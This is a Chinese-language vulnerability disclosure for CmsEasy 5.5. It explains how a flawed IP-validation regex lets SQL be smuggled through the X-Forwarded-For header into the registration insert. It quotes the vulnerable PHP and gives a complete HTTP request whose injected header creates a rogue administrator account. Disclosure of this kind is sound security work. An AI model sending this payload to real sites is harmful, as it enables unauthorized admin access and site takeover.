### 简要描述:
CmsEasy最新版SQL注入可注册管理员
### 详细说明:
CmsEasy_5.5_UTF-8_20140420.rar
官方最新版存在SQL注入,无视GPC,可获取管理员账户,可注册管理员
不知道跟之前蓝哥的那个重复么,先发再看吧。。。
文件/lib/default/user_act.php
```
function respond_action() {
ini_set("display_errors","On");
$classname = front::$get['ologin_code'];
if(front::post('regsubmit')) {
if(!config::get('reg_on')) {
front::flash(lang('网站已经关闭注册!'));
return;
}
if(front::post('username') != strip_tags(front::post('username'))
||front::post('username') != htmlspecialchars(front::post('username'))
) {
front::flash(lang('用户名不规范!'));
return;
}
if(strlen(front::post('username'))<4) {
front::flash(lang('用户名太短!'));
return;
}
if(front::post('username') &&front::post('password')) {
$username=front::post('username');
$password=md5(front::post('password'));
$data=array(
'username'=>$username,
'password'=>$password,
'groupid'=>101,
'userip'=>front::ip(), //======问题在这里======
$classname=>session::get('openid'),
);
if($this->_user->getrow(array('username'=>$username))) {
front::flash(lang('该用户名已被注册!'));
return;
}
$insert=$this->_user->rec_insert($data);
$_userid = $this->_user->insert_id();
if($insert){
front::flash(lang('注册成功!'));
}else {
front::flash(lang('注册失败!'));
return;
}
$user=$data;
cookie::set('login_username',$user['username']);
cookie::set('login_password',front::cookie_encode($user['password']));
session::set('username',$user['username']);
front::redirect(url::create('user'));
exit;
}
}
if (front::post('submit')) {
if (front::post('username') && front::post('password')) {
$username = front::post('username');
$password = md5(front::post('password'));
$data = array(
'username' => $username,
'password' => $password,
);
$user = new user();
$row = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));
if (!is_array($row)) {
$this->login_false();
return;
}
$post[$classname] = session::get('openid');
$this->_user->rec_update($post, 'userid=' . $row['userid']);
cookie::set('login_username', $row['username']);
cookie::set('login_password', front::cookie_encode($row['password']));
session::set('username', $row['username']);
front::redirect(url::create('user'));
return;
} else {
$this->login_false();
return;
}
}
include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php';
$ologinobj = new $classname();
$status = $ologinobj->respond();
//var_dump(session::get('openid'));exit;
$where[$classname] = session::get('openid');
if(!$where[$classname]) front::redirect(url::create('user'));
$user = new user();
$data = $user->getrow($where);
if(!$data){
$this->view->data = $status;
}else{
cookie::set('login_username',$data['username']);
cookie::set('login_password',front::cookie_encode($data['password']));
session::set('username',$data['username']);
front::redirect(url::create('user'));
}
}
```
我们再进入ip()函数:
文件/lib/tool/front_class.php
```
static function ip() {
if ($_SERVER['HTTP_CLIENT_IP']) {
$onlineip = $_SERVER['HTTP_CLIENT_IP'];
}
elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) {
$onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
elseif ($_SERVER['REMOTE_ADDR']) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
else {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
if(config::get('ipcheck_enable')){
if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){
exit('来源非法');
}
}
return $onlineip;
}
```
乍一看没什么问题,对ip进行了过滤
但是我们看看后面的那个正则的最后面:
(%.+)?\s*
这里有一个%,然后后面可以跟任何内容,127.0.0.1%xxxxxx
这样也是符号正则的,这不就绕过了。。。。
难道这是后门?!
最后进入了:$insert=$this->_user->rec_insert($data);
导致了注入产生。。。
### 漏洞证明:
之前的用户信息:
[<img src="https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173851c32d6175893d49402f04ef758921b872.png)
发送请求:
```
POST /cmseasy1/index.php?case=user&act=respond HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
X-Forwarded-For: 127.0.0.1%'),('xfkxfk','e10adc3949ba59abbe56e057f20f883e','2','127.0.0.1')#
username=666666&password=666666®submit=%2B%E6%B3%A8%E5%86%8C%2B
```
[<img src="https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/041739140b5bdd8506a372e702c392fecf8752bf.png)
成功添加管理员xfkxfk
[<img src="https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/04173927c19d085b963cfb1d6b387cbe0b2216b0.png)
京公网安备 11010502034610号
暂无评论